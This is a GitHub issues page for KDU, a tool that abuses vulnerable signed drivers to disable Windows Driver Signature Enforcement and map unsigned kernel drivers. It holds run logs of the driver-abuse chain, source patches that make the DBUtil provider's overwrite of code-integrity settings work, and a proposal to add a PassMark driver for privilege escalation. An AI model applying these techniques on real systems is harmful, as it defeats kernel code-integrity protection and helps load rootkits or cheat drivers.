 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

kdu's Issues

[Support] Bad image format when trying to map a driver

Hi,
Whenever I try to map a driver, I get a bad image format exception. I've tried with two I've compiled on my home system now. I have sign task off and when I register them as a service using your DSE disable function they load normally. Do I need to enable some other compile-time switch to fit the "driverless" protocol?
Thanks

[!] Bootstrap code size 0x1875 exceeds limit 0x794, abort

C:\Users\caioc\Desktop>kdu -map driver.sys
[#] Kernel Driver Utility v1.2.8 (build 2212) started, (c)2020 - 2022 KDU Project
[#] Build at Fri Dec  9 01:44:47 2022, header checksum 0x7C8AA
[#] Supported x64 OS : Windows 7 and above
[*] Debug Mode Run
[*] CPU vendor string: AuthenticAMD
[*] Windows version: 10.0 build 22000
[*] SecureBoot is enabled on this machine
[*] WHQL enforcement ENABLED
[+] MSFT Driver block list is disabled
[*] Driver mapping using shellcode version: 1
[+] Input driver file "driver.sys" loaded at 0x00007FF6C77D0000
[+] Drivers database "drv64.dll" loaded at 0x00007FFCEAD50000
[+] Firmware type (FirmwareTypeUefi)
[+] Provider: "CVE-2015-2291", Name "NalDrv"
[+] Extracting vulnerable driver as "C:\Users\caioc\Desktop\NalDrv.sys"
[+] Vulnerable driver "NalDrv" loaded
[+] Driver device "NalDrv" has successfully opened
[+] Executing post-open callback for given provider
[+] Driver device security descriptor set successfully
[+] Victim "PROCEXP152" 1 acquire attempt of 3 (max)
[+] Processing victim "Process Explorer" driver
[+] Extracting victim driver "PROCEXP152" as "C:\Windows\system32\drivers\PROCEXP152.sys"
[+] Victim is accepted, handle 0x00000000000000D4
[+] Reading FILE_OBJECT at 0xFFFFC70BB8C872D0
[+] Reading DEVICE_OBJECT at 0xFFFFC70BB2CBCAF0
[+] Reading DRIVER_OBJECT at 0xFFFFC70BB3DB9BF0
[+] Victim IRP_MJ_DEVICE_CONTROL 0xFFFFF803448E2220
[+] Victim DriverUnload 0xFFFFF803448E3280
[+] Loaded ntoskrnl base 0xFFFFF80111C00000
[+] Ntoskrnl.exe mapped at 0x7FF612180000
[+] Resolving kernel import for input driver
[+] Resolving payload import
[!] Bootstrap code size 0x1875 exceeds limit 0x794, abort
[!] Unexpected shellcode procedure size, abort
[!] Error while building shellcode, abort
[+] Victim released
[+] Vulnerable driver "NalDrv" unloaded
[+] Vulnerable driver file removed
[+] Return value: 0. Bye-bye!

Do you have any idea what could be causing this problem?

Windows 11 issues.

I'm use modified KDU for load unsigned kernel driver for my project.

Recently, i got complaints from W11 users - driver loading fail, followed by BSOD with KMODE_EXCEPTION_NOT_HANDLED - seems like provided by system antivirus.

Can you, please, check what do they change?

Heavy system load at target driver call

Thanks for tool, it can help me to avoid stupid and non-free fingerprinting, but i need you help.

I write a tool to control fans/temps/power distribution for some specific hardware (specific manufacturer).
It uses kernel driver, so now it can only work in test mode.
I try to use your tool, and the current stage is:

  • I can successfully load driver, initialization is OK.
  • I can access driver trough IO, operation chain works as well.

The issue are - some IO operations provide heavy system load (interrupts catch 50-80% CPU).
They work, but took minutes to hour at so unresponsive system.

I'm out of ideas why it happened, direct loading didn't provide this issue.

PS: I access ACPI driver from mine, is this the source of the issue? How can I fix it?

[Information] Microsoft banned Microsoft SysInternals Process Explorer driver

It took them 10+ years and about 4 different APT usages (which I can count/remember) to figure out that something is wrong with it.

Recent update of WDAC blocklist now include block of all Process Explorer drivers with version <=16.x. Since this driver is used in KDU as well (as victim shellcode placeholder/target) this change will also affect KDU.

New 17.x Process Explorer driver bring the following "security" improvements:

First, in IOCTL callable routine responsible for openning handle for given process it now checks whatever this process you want to open is "protected" (PsIsProtectedProcess) and if it is - then sets access flags to PROCESS_QUERY_LIMITED_INFORMATION.

Second, the routine involving ZwDuplicateObject also got similar update not allowing you to duplicate handles of protected processes or PsInitialSystemProcess.

DSE bypass not working on 20H2 after KB5003173 update

The latest Windows update for 20H2 that is KB5003173, breaks the functionality of the DSE bypass.

Steps to reproduce:

  • Upgrade your OS to the newest version available
  • Run KDU as follows: kdu.exe -dse 0
  • Observe the unchanged code integrity options value

KDU will report success in despite of the code integrity options value hasn't been altered. Hence, NtLoadDriver will report STATUS_INVALID_IMAGE_HASH.
I have also checked it using NtQuerySystemInformation(SystemCodeIntegrityInformation... and here's the output of that:

CODEINTEGRITY_OPTION_TESTSIGN=FALSE
CODEINTEGRITY_OPTION_UMCI_ENABLED=FALSE
CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED=FALSE
CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED=FALSE
CODEINTEGRITY_OPTION_TEST_BUILD=FALSE
CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD=FALSE
CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED=FALSE
CODEINTEGRITY_OPTION_FLIGHT_BUILD=FALSE
CODEINTEGRITY_OPTION_FLIGHTING_ENABLED=FALSE
CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED=FALSE
CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED=FALSE
CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED=FALSE
CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED=TRUE

CodeIntegrityOptions=0x2001

I suspect the memory location of the target variable has changed.

Randomly BSOD

Hello hfiref0x i am testing with a weird issue let me explain. I have 2 computers both uses the same Windows 10 edition (Professional) and build (the latest) 19041.1023, on the first computer i don't get BSOD never but on the second i get BSOD after some minutes after modifiying CI.DLL value (i always restore the original value) the BSOD error code is CRITICAL_STRUCTURE_CORRUPTION - CI.DLL. This happened to me before i fixed it by reinstalling Windows with a the latest version via USB, its there any alternative to the reinstall? Thanks.

BSOD with hyper-v turned on in Windows 11 22H2

If I have hyper-v turned on:

bcdedit.exe /set hypervisorlaunchtype auto

provider 0 will BSOD on win11

If I turn hyper-v off it will work without problems:

bcdedit.exe /set hypervisorlaunchtype off

Is it possible to make it work with hyper-v launch?

Does not work with installed Hyper-V

So, i had bsod after add Hyper-V component of windows. And kdu works after uninstall Hyper-V. Is this normal behavior? Or fixable?
used: Win 11 22000.318, -dse command

Unable to re-enable DSE

I have typed the following cmd in the my console "kdu.exe" -prv 1 -dse 6".
After reentering the same command again (6 replaced with 0)
I was not able to restart my computer without dse dsiabled... I have no clue how to reenable dse because all the methods i've used (bcdedit.exe /set nointegritychecks off & troubleshoot restart and enable dse) don't work. Any ideas?

Disabling DSE with the drivers DBUtil v2.3 and v2.5 shows BSOD

Hi hfiref0x,

first many thanks and much respect to your hard work. It is always nice to see someone skilled releasing sources for others to learn. This is much appreciated. I myself have used your DSEFix extensively to load unsigned drivers since years. Lately I switched to KDU and got a BSOD on the DBUtil providers. The details and a potential fix follow below.

With DBUtil v2.3 driver we get a BSOD on Windows 10 and an instant reboot on Windows 7. The problem is related to the function "DbUtilWriteVirtualMemory" in the source code file "KDU-master\Source\Hamakaze\idrv\dbutil.cpp". The size of the structure which DBUtil accepts for input is increased by the following code line:

size = ALIGN_UP_BY(value, PAGE_SIZE);

Because DBUtil v2.3 uses the buffer size specified in DeviceIoControl as the size to transfer, it writes 4096 bytes to the virtual kernel address where g_CiOptions on Windows 10 and g_CiEnable on Windows 7 variable is located. Because this write occurs on read only memory we see a BSOD. We corrected this by setting the "size" variable equal to "value" in the source code like follows:

value = FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
//size = ALIGN_UP_BY(value, PAGE_SIZE);
size = value;

KDU_DBUtil_Patch2

The same should be implemented for the function "DbUtilReadVirtualMemory", but this does not cause a BSOD, because the memory is only read and not written for 4096 bytes.

In addition we tested the DBUtil v2.5 driver, which does not even install correctly. This is related to the function "DbUtilManageFiles" in the same source code file. This function first unpacks the driver to the program directory and afterwards extracts the INF and CAT files to the TEMP directory. Therefore the INF can not find the driver and the installation does not work. We also patched this with the following code change:

//cch = supExpandEnvironmentStrings(L"%temp%\\", szFileName, MAX_PATH);
lstrcpy(szFileName, Context->DriverFileName);
lpEnd = wcsrchr(szFileName, '\\');
*(lpEnd + 1) = 0;
//if (cch == 0 || cch > MAX_PATH) {
// SetLastError(ERROR_NOT_ENOUGH_MEMORY);
//}
//else {

KDU_DBUtil_Patch1

We should implement this patch two times for the install and the uninstall part of this function. If we would only apply the 2nd unpacking patch, we can see that the driver DBUtil v2.5 does also cause a BSOD for the same reason as DBUtil v2.3 driver. Therefore the 1st patch does also solve the problem with DBUtil v2.5. After all patches are applied we can change DSE successfully with both providers.

KDU_DBUtil_v2 3

KDU_DBUtil_v2 5

I have attached a fixed and already patched source code file with comments. I hope that helps in fixing the little DBUtil bug.

KDU_dbutil_patched.zip

Keep the amazing stuff coming!
Greets Kai Schtrom

TYPO README.md

Hello,

In this issue, I have identified two minor typos that need correction.

occured -> occurred README.md L79
expirienced -> experienced README.md L177

Thank you for your time and consideration in addressing these errors.
Best regards,
Melody

Could not load drivers database.

I have been using KDU for a while now and all of a sudden I'm getting this error?
I can't seem to find any more about this issue besides it's 0xC000005? Doesn't matter what provider I use.

[Enhancement] Add PassMark LPE-ready driver

Demo for references, https://gist.github.com/hfiref0x/33985b7694c06bc8ee6d8385efadb85e

Driver details:
SHA256, EV certificate, full of bugs and vulnerabilities.
Dedicated previous CVE id: CVE-2020-15481, CVE-2020-15480

CVE vendor response:
CVE-2020-15480, Ban LSTAR and SYSENTER_EIP_MSR from readmsr IOCTL.
CVE-2020-15481, disputable CVE, when loaded with PassMark software DirectIO driver device despite having default SD will be created with DO_EXCLUSIVE object flags, thus it won't allow multiple handles and potential PoC won't work unless they somehow got into PassMark program address space which require elevation or another exploit. PassMark addressed this with regenerating IOCTL's values and leaving everything as is.

PassMark DirectIO mapping routines for reference https://gist.github.com/hfiref0x/fb822ab89c9f10c46deb172c961ce7bf

Windows crashes after minutes after re-enable DSE

Hi,
I use kdu -dse 0 to disable DSE and then I load my driver. (at first attempt it says current value is 16 and set to 0)
I use kdu -dse 6 to re-enable DSE just in less than 30 sec. (i tried -dse 16 but it set it to 10)
Everything works perfectly until after minutes system crashes with bluescreen.

Event Log says :

The mrxsmb10 service failed to start due to the following error: Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

mrxsmb10 is a unsigned driver from Microsoft itself. How can i avoid this?

_Also out of curiosity how those unsigned drivers are loaded by Microsoft at first place it's like 100+ drivers with not certificate in system32/drivers ?

Use WskRegister will definitely BSOD

WSK_REGISTRATION WskRegistration;
WSK_CLIENT_DISPATCH WskDispatch = { MAKE_WSK_VERSION(1,0), 0, NULL };

WSK_CLIENT_NPI WskClient;
WskClient.ClientContext = NULL;
WskClient.Dispatch = &WskDispatch;

WskRegister(&WskClient, &WskRegistration);

I do not know why。。。

BSOD KMODE_EXEPTION_NOT_HANDLED

Hello
i got BSOD KMODE_EXEPTION_NOT_HANDLED
when i -map my driver
driver dont have any params and unload driver set to NULL
what is issue
thank you

win 11

i cant load map driver or use dse in window 11
i got this

Abort: selected provider does not support HVCI

how to fix it ?

DSE

What happens I don't set dse 0 and dse 6 after mapping the driver?

please teach me

If I try to use PsSetCreateProcessNotifyRoutine, it will return 0xc0000022. If I use WskRegister, it will directly blue screen. Is there any solution? thanks!
The following is part of the dump information:

KMODE_EXCEPTION_NOT_HANDLED (1e)
This is a very common BugCheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Arguments:
Arg1: ffffffffc0000005, The exception code that was not handled
Arg2: 000000000000a13e, The address that the exception occurred at
Arg3: 0000000000000008, Parameter 0 of the exception
Arg4: 000000000000a13e, Parameter 1 of the exception

Debugging Details:

*** WARNING: Unable to verify checksum for win32k.sys

KEY_VALUES_STRING: 1

Key  : Analysis.CPU.mSec
Value: 4624

Key  : Analysis.DebugAnalysisManager
Value: Create

Key  : Analysis.Elapsed.mSec
Value: 10453

Key  : Analysis.Init.CPU.mSec
Value: 562

Key  : Analysis.Init.Elapsed.mSec
Value: 11240

Key  : Analysis.Memory.CommitPeak.Mb
Value: 80

Key  : WER.OS.Branch
Value: vb_release

Key  : WER.OS.Timestamp
Value: 2019-12-06T14:06:00Z

Key  : WER.OS.Version
Value: 10.0.19041.1

BUGCHECK_CODE: 1e

BUGCHECK_P1: ffffffffc0000005

BUGCHECK_P2: a13e

BUGCHECK_P3: 8

BUGCHECK_P4: a13e

WRITE_ADDRESS: fffff8067eafa390: Unable to get MiVisibleState
Unable to get NonPagedPoolStart
Unable to get NonPagedPoolEnd
Unable to get PagedPoolStart
Unable to get PagedPoolEnd
unable to get nt!MmSpecialPagesInUse
000000000000a13e

EXCEPTION_PARAMETER1: 0000000000000008

EXCEPTION_PARAMETER2: 000000000000a13e

BLACKBOXBSD: 1 (!blackboxbsd)

BLACKBOXNTFS: 1 (!blackboxntfs)

BLACKBOXPNP: 1 (!blackboxpnp)

BLACKBOXWINLOGON: 1

CUSTOMER_CRASH_COUNT: 1

PROCESS_NAME: System

TRAP_FRAME: ffff800000000000 -- (.trap 0xffff800000000000)
Unable to read trap frame at ffff8000`00000000

STACK_TEXT:
fffffd8cb9171bf8 fffff8067e259ecb : 000000000000001e ffffffffc0000005 000000000000a13e 0000000000000008 : nt!KeBugCheckEx
fffffd8cb9171c00 fffff8067e2092ac : 0000000000001000 fffffd8cb91724a0 ffff800000000000 0000000000000000 : nt!KiDispatchException+0x17467b
fffffd8cb91722c0 fffff8067e205443 : 0000000000000c10 ffffe91085f6ac10 0000000000000000 000000000a2af350 : nt!KiExceptionDispatch+0x12c
fffffd8cb91724a0 000000000000a13e : ffff9c84f39be413 0000000000000000 0000000000000000 0000000000000000 : nt!KiPageFault+0x443
fffffd8cb9172638 ffff9c84f39be413 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : 0xa13e
fffffd8cb9172640 0000000000000000 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : 0xffff9c84`f39be413

SYMBOL_NAME: nt!KiDispatchException+17467b

MODULE_NAME: nt

IMAGE_NAME: ntkrnlmp.exe

IMAGE_VERSION: 10.0.19041.1237

STACK_COMMAND: .thread ; .cxr ; kb

BUCKET_ID_FUNC_OFFSET: 17467b

FAILURE_BUCKET_ID: 0x1E_c0000005_nt!KiDispatchException

OS_VERSION: 10.0.19041.1

BUILDLAB_STR: vb_release

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

FAILURE_ID_HASH: {1f8f9473-8a73-d8e8-6f8e-f77ccc1647ea}

Followup: MachineOwner

Unable to load the driver

  • Unable to load vulnerable driver, NTSTATUS (0xC0000603)
    Which stands for STATUS_IMAGE_CERT_REVOKED
    Is there any fix to it? I've been searching for a while but can't find any.
    OS: win11 newest

BSOD while kdu.exe -map mydrv.sys

hello, hfire0x. First of all, thank you for your project. It was great.

this is my dump ,I used windbg and found that some functions had wrong addresses, such as "MmGetSystemRoutineAddress" or "DbgPrintEx",I think this is probably because the ntoskrnl import is wrong(Of course, my guess may not be right 😁)
102022-9578-01.zip

this is the entry of my driver:

extern "C" NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath)
{
	UNREFERENCED_PARAMETER(DriverObject);
	UNREFERENCED_PARAMETER(RegistryPath);

	__debugbreak();

        // Direct use of ”DbgPrintEx“ Also will go wrong
	UNICODE_STRING str;
	RtlInitUnicodeString(&str, L"DbgPrintEx");
	sys_DbgPrintEx = (P_DbgPrintEx)MmGetSystemRoutineAddress(&str);
	sys_DbgPrintEx(0, 0, "[LysdDrv] LysdDrv DriverEntry start \n");

	return STATUS_UNSUCCESSFUL;
}

But the strange thing is that the other driver just works and their driverentry is exactly the same,So I compared their project attributes and changed them to the same(I swear I checked every attribute very carefully),But helplessly, they still only have a blue screen, the other one is normal.

I hope you can help me. Thank you!

vulnerable driver is already loaded

friend of mine cant load the driver but for me its work we use same windows version 22621.1413 windows 11

me

Ct82PAPLSmGvnADSKgnXyQ

friend

image

what is the issue here?

Windows 11 22H2 last version

Hello. I tried enable DSE on Windows 11 22H2 last version, but i got error "unable to load vulnerable driver, ntstatus 0xc0000603".
Is not supported? I disabled windows defender.

error

[#] Kernel Driver Utility v1.3.3 (build 2307) started, (c)2020 - 2023 KDU Project
[#] Built at Fri Sep 1 14:29:34 2023, header checksum 0x81FE7
[#] Supported x64 OS : Windows 7 and above
[] Debug Mode Run, several features (like a shellcode proper generation) will be unavailable
[
] CPU vendor string: AuthenticAMD
[] Windows version: 10.0 build 22621
[
] SecureBoot is enabled on this machine
[] WHQL enforcement ENABLED
[+] MSFT Driver block list is disabled
[
] Driver mapping using shellcode version: 1
[+] Input driver file "KernelCheatYT.sys" loaded at 0x00007FF6FE660000
[+] MSFT hypervisor present
[!] Cannot load drivers database, GetLastError 126: The specified module could not be found.
[+] Return value: 0. Bye-bye!

Unable to unload vulnerable driver, NTSTATUS (0xC0000010)

I get this error when I try kdu.exe -dse 6

[#] Kernel Driver Utility v1.2.8 (build 2212) started, (c)2020 - 2022 KDU Project
[#] Build at Fri Dec  9 07:44:47 2022, header checksum 0x4FDEE
[#] Supported x64 OS : Windows 7 and above
[*] CPU vendor string: AuthenticAMD
[*] Windows version: 10.0 build 22621
[*] SecureBoot is disabled on this machine
[+] MSFT Driver block list is disabled
[+] Drivers database "drv64.dll" loaded at 0x00007FF8A1280000
[+] Firmware type (FirmwareTypeUefi)
[+] Provider: "CVE-2015-2291", Name "NalDrv"
[!] Vulnerable driver is already loaded
[+] Driver device "NalDrv" has successfully opened
[+] Executing post-open callback for given provider
[+] Driver device security descriptor set successfully
[+] Module "CI.dll" loaded for pattern search
[!] Could not query DSE state, GetLastError 5
[!] Unable to unload vulnerable driver, NTSTATUS (0xC0000010)
[+] Return value: 0. Bye-bye!

I already tried kdu.exe -prv 0 1 2 3 and others I changed provider but still same. Here is -diag result


> [#] Kernel Driver Utility v1.2.8 (build 2212) started, (c)2020 - 2022 KDU Project
> [#] Build at Fri Dec  9 07:44:47 2022, header checksum 0x4FDEE
> [#] Supported x64 OS : Windows 7 and above
> [*] CPU vendor string: AuthenticAMD
> [*] Windows version: 10.0 build 22621
> [*] SecureBoot is disabled on this machine
> [+] MSFT Driver block list is disabled
> [+] Running system diagnostics
> > System range start FFFF800000000000
> > Speculation mitigation state flags
>         >> SystemKernelVaShadowInformation
>                 KvaShadowEnabled ←[37mFALSE
> ←[37m           KvaShadowUserGlobal ←[37mFALSE
> ←[37m           KvaShadowPcid ←[37mFALSE
> ←[37m           KvaShadowInvpcid ←[37mFALSE
> ←[37m           KvaShadowRequired ←[37mFALSE
> ←[37m           KvaShadowRequiredAvailable ←[32mTRUE
> ←[37m   InvalidPteBit 0
>                 L1DataCacheFlushSupported ←[37mFALSE
> ←[37m           L1TerminalFaultMitigationPresent ←[32mTRUE
> ←[37m   >> SystemSpeculationControlInformation
>                 BpbEnabled ←[32mTRUE
> ←[37m           BpbDisabledSystemPolicy ←[37mFALSE
> ←[37m           BpbDisabledNoHardwareSupport ←[37mFALSE
> ←[37m           SpecCtrlEnumerated ←[32mTRUE
> ←[37m           SpecCmdEnumerated ←[32mTRUE
> ←[37m           IbrsPresent ←[32mTRUE
> ←[37m           StibpPresent ←[32mTRUE
> ←[37m           SmepPresent ←[32mTRUE
> ←[37m           SpeculativeStoreBypassDisableAvailable ←[32mTRUE
> ←[37m           SpeculativeStoreBypassDisableSupported ←[32mTRUE
> ←[37m           SpeculativeStoreBypassDisabledSystemWide ←[37mFALSE
> ←[37m           SpeculativeStoreBypassDisabledKernel ←[37mFALSE
> ←[37m           SpeculativeStoreBypassDisableRequired ←[32mTRUE
> ←[37m           BpbDisabledKernelToUser ←[37mFALSE
> ←[37m           SpecCtrlRetpolineEnabled ←[32mTRUE
> ←[37m           SpecCtrlImportOptimizationEnabled ←[32mTRUE
> ←[37m           EnhancedIbrs ←[37mFALSE
> ←[37m           HvL1tfStatusAvailable ←[37mFALSE
> ←[37m           HvL1tfProcessorNotAffected ←[37mFALSE
> ←[37m           HvL1tfMigitationEnabled ←[37mFALSE
> ←[37m           HvL1tfMigitationNotEnabled_Hardware ←[37mFALSE
> ←[37m           HvL1tfMigitationNotEnabled_LoadOption ←[37mFALSE
> ←[37m           HvL1tfMigitationNotEnabled_CoreScheduler ←[37mFALSE
> ←[37m           EnhancedIbrsReported ←[32mTRUE
> ←[37m           MdsHardwareProtected ←[37mFALSE
> ←[37m           MbClearEnabled ←[37mFALSE
> ←[37m           MbClearReported ←[32mTRUE
> ←[37m           TsxCtrlStatus 3
>                 TsxCtrlReported ←[32mTRUE
> ←[37m           TaaHardwareImmune ←[32mTRUE
> ←[37m   >> SystemSpeculationControlInformation v2
>                 SbdrSsdpHardwareProtected ←[37mFALSE
> ←[37m           FbsdpHardwareProtected ←[37mFALSE
> ←[37m           PsdpHardwareProtected ←[37mFALSE
> ←[37m           FbClearEnabled ←[37mFALSE
> ←[37m           FbClearReported ←[32mTRUE
> ←[37m> List of loaded drivers
>         [#] [ImageBase] [ImageSize] [FileName]
>         0 FFFFF80114400000 17068032 \SystemRoot\system32\ntoskrnl.exe
>         1 FFFFF801115C0000 24576 \SystemRoot\system32\hal.dll
>         2 FFFFF801115D0000 45056 \SystemRoot\system32\kd.dll
>         3 FFFFF80111580000 217088 \SystemRoot\system32\mcupdate_AuthenticAMD.dll
>         4 FFFFF80116A30000 450560 \SystemRoot\System32\drivers\CLFS.SYS
>         5 FFFFF80116A00000 167936 \SystemRoot\System32\drivers\tm.sys
>         6 FFFFF801115E0000 110592 \SystemRoot\system32\PSHED.dll
>         7 FFFFF80116AA0000 53248 \SystemRoot\system32\BOOTVID.dll
>         8 FFFFF80116BD0000 483328 \SystemRoot\System32\drivers\FLTMGR.SYS
>         9 FFFFF80116C80000 397312 \SystemRoot\System32\drivers\msrpc.sys
>         10 FFFFF80116C50000 180224 \SystemRoot\System32\drivers\ksecdd.sys
>         11 FFFFF80116AB0000 1130496 \SystemRoot\System32\drivers\clipsp.sys
>         12 FFFFF80116CF0000 61440 \SystemRoot\System32\drivers\cmimcext.sys
>         13 FFFFF80116D00000 90112 \SystemRoot\System32\drivers\werkernel.sys
>         14 FFFFF80116D20000 49152 \SystemRoot\System32\drivers\ntosext.sys
>         15 FFFFF80116D30000 991232 \SystemRoot\system32\CI.dll
>         16 FFFFF80116E30000 774144 \SystemRoot\System32\drivers\cng.sys
>         17 FFFFF80116EF0000 815104 \SystemRoot\system32\drivers\Wdf01000.sys
>         18 FFFFF80116FE0000 77824 \SystemRoot\system32\drivers\WppRecorder.sys
>         19 FFFFF80116FC0000 94208 \SystemRoot\system32\drivers\WDFLDR.SYS
>         20 FFFFF80117000000 57344 \SystemRoot\System32\DriverStore\FileRepository\prm.inf_amd64_de435dc5c75d64a5\PRM.sys
>         21 FFFFF80117010000 159744 \SystemRoot\System32\Drivers\acpiex.sys
>         22 FFFFF80117040000 114688 \SystemRoot\system32\drivers\SgrmAgent.sys
>         23 FFFFF80117060000 753664 \SystemRoot\System32\drivers\ACPI.sys
>         24 FFFFF80117120000 49152 \SystemRoot\System32\drivers\WMILIB.SYS
>         25 FFFFF80117130000 45056 \SystemRoot\System32\drivers\msisadrv.sys
>         26 FFFFF80117140000 565248 \SystemRoot\System32\drivers\pci.sys
>         27 FFFFF801171D0000 356352 \SystemRoot\System32\drivers\tpm.sys
>         28 FFFFF80117260000 483328 \SystemRoot\System32\drivers\intelpep.sys
>         29 FFFFF801172E0000 98304 \SystemRoot\system32\drivers\WindowsTrustedRT.sys
>         30 FFFFF80117300000 77824 \SystemRoot\System32\drivers\IntelPMT.sys
>         31 FFFFF80117320000 45056 \SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys
>         32 FFFFF80117330000 90112 \SystemRoot\System32\drivers\pcw.sys
>         33 FFFFF80117350000 372736 \SystemRoot\System32\Drivers\klupd_klif_arkmon.sys
>         34 FFFFF801173B0000 114688 \SystemRoot\System32\drivers\vdrvroot.sys
>         35 FFFFF801173D0000 245760 \SystemRoot\system32\DRIVERS\cm_km.sys
>         36 FFFFF80117410000 200704 \SystemRoot\system32\drivers\pdc.sys
>         37 FFFFF80117450000 98304 \SystemRoot\system32\drivers\CEA.sys
>         38 FFFFF80117470000 208896 \SystemRoot\System32\drivers\partmgr.sys
>         39 FFFFF801174B0000 921600 \SystemRoot\System32\drivers\spaceport.sys
>         40 FFFFF801175A0000 114688 \SystemRoot\System32\drivers\volmgr.sys
>         41 FFFFF801175C0000 409600 \SystemRoot\System32\drivers\volmgrx.sys
>         42 FFFFF80117630000 126976 \SystemRoot\System32\drivers\mountmgr.sys
>         43 FFFFF80117650000 204800 \SystemRoot\System32\drivers\storahci.sys
>         44 FFFFF80117690000 1159168 \SystemRoot\System32\drivers\storport.sys
>         45 FFFFF801177B0000 241664 \SystemRoot\System32\drivers\stornvme.sys
>         46 FFFFF801177F0000 147456 \SystemRoot\System32\drivers\EhStorClass.sys
>         47 FFFFF80117820000 114688 \SystemRoot\System32\drivers\fileinfo.sys
>         48 FFFFF80117840000 290816 \SystemRoot\System32\Drivers\Wof.sys
>         49 FFFFF80117890000 487424 \SystemRoot\system32\drivers\wd\WdFilter.sys
>         50 FFFFF80117910000 3366912 \SystemRoot\System32\Drivers\Ntfs.sys
>         51 FFFFF80117C50000 61440 \SystemRoot\System32\Drivers\Fs_Rec.sys
>         52 FFFFF80117C60000 1630208 \SystemRoot\system32\drivers\ndis.sys
>         53 FFFFF80117DF0000 647168 \SystemRoot\system32\drivers\NETIO.SYS
>         54 FFFFF80117E90000 217088 \SystemRoot\System32\Drivers\ksecpkg.sys
>         55 FFFFF80117ED0000 53248 \SystemRoot\System32\drivers\amdpsp.sys
>         56 FFFFF80117EE0000 3338240 \SystemRoot\System32\drivers\tcpip.sys
>         57 FFFFF80118210000 536576 \SystemRoot\System32\drivers\fwpkclnt.sys
>         58 FFFFF801182A0000 200704 \SystemRoot\System32\drivers\wfplwfs.sys
>         59 FFFFF801182E0000 868352 \SystemRoot\System32\DRIVERS\fvevol.sys
>         60 FFFFF801183C0000 45056 \SystemRoot\System32\drivers\volume.sys
>         61 FFFFF801183D0000 458752 \SystemRoot\System32\drivers\volsnap.sys
>         62 FFFFF80118450000 331776 \SystemRoot\System32\drivers\rdyboost.sys
>         63 FFFFF801184B0000 159744 \SystemRoot\System32\Drivers\mup.sys
>         64 FFFFF801184E0000 172032 \SystemRoot\System32\Drivers\klupd_klif_klbg.sys
>         65 FFFFF80118510000 77824 \SystemRoot\system32\drivers\iorate.sys
>         66 FFFFF80118550000 131072 \SystemRoot\System32\drivers\disk.sys
>         67 FFFFF80118580000 479232 \SystemRoot\System32\drivers\CLASSPNP.SYS
>         68 FFFFF801232D0000 163840 \SystemRoot\System32\Drivers\crashdmp.sys
>         69 FFFFF80123000000 102400 \SystemRoot\system32\DRIVERS\klbackupdisk.sys
>         70 FFFFF80123020000 204800 \SystemRoot\System32\drivers\cdrom.sys
>         71 FFFFF80123060000 581632 \SystemRoot\system32\DRIVERS\klflt.sys
>         72 FFFFF801230F0000 204800 \SystemRoot\system32\DRIVERS\klbackupflt.sys
>         73 FFFFF80123130000 90112 \SystemRoot\system32\drivers\filecrypt.sys
>         74 FFFFF80123150000 65536 \SystemRoot\system32\drivers\tbs.sys
>         75 FFFFF80123170000 1064960 \SystemRoot\system32\DRIVERS\klif.sys
>         76 FFFFF80124BE0000 544768 \SystemRoot\system32\DRIVERS\ks.sys
>         77 FFFFF80124200000 1871872 \SystemRoot\system32\DRIVERS\klhk.sys
>         78 FFFFF801243D0000 720896 \SystemRoot\system32\DRIVERS\klgse.sys
>         79 FFFFF80124490000 77824 \SystemRoot\system32\DRIVERS\klpd.sys
>         80 FFFFF801244B0000 118784 \SystemRoot\system32\DRIVERS\kldisk.sys
>         81 FFFFF801244D0000 45056 \SystemRoot\System32\Drivers\Null.SYS
>         82 FFFFF801244E0000 40960 \SystemRoot\System32\Drivers\Beep.SYS
>         83 FFFFF801244F0000 4689920 \SystemRoot\System32\drivers\dxgkrnl.sys
>         84 FFFFF80124970000 139264 \SystemRoot\System32\drivers\watchdog.sys
>         85 FFFFF801249A0000 94208 \SystemRoot\System32\DriverStore\FileRepository\basicdisplay.inf_amd64_02da009b3d736cc1\BasicDisplay.sys
>         86 FFFFF801249C0000 73728 \SystemRoot\System32\DriverStore\FileRepository\basicrender.inf_amd64_f7df692e0f5ee07f\BasicRender.sys
